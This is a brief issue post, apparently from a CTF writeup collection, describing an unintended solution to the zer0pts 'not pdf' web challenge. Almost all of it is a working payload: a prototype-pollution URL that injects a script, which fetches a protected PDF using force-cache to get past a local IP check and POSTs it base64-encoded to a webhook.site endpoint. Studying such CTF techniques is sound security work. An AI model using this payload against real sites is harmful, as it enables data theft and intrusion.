Open aszx87410 opened 3 years ago
not pdf unintended from parrot
https://notpdfgen.ctf.zer0pts.com:8443/?sdf[constructor][prototype][title]=2&sdf[constructor][prototype][template][nodeType]=2&sdf[constructor][prototype][template][innerHTML]=<div id="app"><h3>{{title}}</h3><embed src="/9ab76d233b52165bf9450f81d0784425" type="application/pdf"><iframe srcdoc="<script>setTimeout(()=>{fetch('/9ab76d233b52165bf9450f81d0784425',{'cache':'force-cache'}).then((r)=>r.blob()).then((r)=>{
var reader = new FileReader();
reader.readAsDataURL(r);
reader.onloadend = function() {
var base64data = reader.result;
fetch(`https://webhook.site/QQ`,{method:`POST`,body:base64data});}
})},1000);</script>"></iframe></div>
use 'cache':'force-cache'
to bypass local ip check, brilliant!
All official writeup: https://hackmd.io/@ptr-yudai/B1bk04fmu
Writeups